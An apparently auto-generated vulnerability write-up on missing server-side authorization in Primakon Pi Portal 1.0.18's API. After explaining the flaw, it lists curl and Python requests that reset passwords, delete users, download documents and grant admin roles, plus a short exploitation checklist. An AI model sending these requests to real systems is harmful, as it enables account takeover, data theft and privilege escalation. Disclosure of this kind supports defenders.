How the CVE works:
Primakon Pi Portal version 1.0.18 API endpoints lack server-side authorization validation, relying solely on UI restrictions. When direct HTTP requests are sent to administrative endpoints, the backend fails to verify user roles or permissions. Standard authenticated users can craft requests using tools like curl to bypass front-end controls. For example, a PUT request to /api/users/{id} with a JSON payload allows modification of arbitrary user accounts, including password changes or deletions. Similarly, GET requests to /api/documents/{id} enable unauthorized download of sensitive documents. This flaw stems from missing access control lists (ACLs) or role-based checks in endpoint handlers. The vulnerability permits remote exploitation by any authenticated user, leading to data integrity breaches, confidentiality loss, and privilege escalation. Attackers can manipulate core system functions, compromising the entire application. The issue is rooted in the assumption that API calls are only made via the admin UI, but direct network requests expose the endpoints. HTTP methods such as POST, PUT, and DELETE are vulnerable when sent with valid session cookies. No token or permission validation occurs, allowing attackers to escalate to admin privileges. Exploitation requires knowledge of endpoint URLs, which may be gleaned from client-side code or network traffic. The vulnerability highlights common misconfigurations in web application security, where backend logic neglects authorization for API routes.
Platform: Primakon Pi Portal

What Undercode Say:
Analytics:
curl -X PUT -H “Content-Type: application/json” -H “Cookie: session=valid_token” -d ‘{“password”:”hacked”}’ http://target/api/users/5
curl -X GET -H “Cookie: session=valid_token” http://target/api/documents/10 -o secret.pdf
curl -X DELETE -H “Cookie: session=valid_token” http://target/api/users/3
import requests; response = requests.put(‘http://target/api/users/7’, json={‘role’:’admin’}, cookies={‘session’:’valid_token’})
How Exploit:
1. Authenticate as standard user.
2. Identify admin endpoints via network inspection.
3. Craft direct HTTP requests to endpoints.
4. Use curl or scripts to modify data.
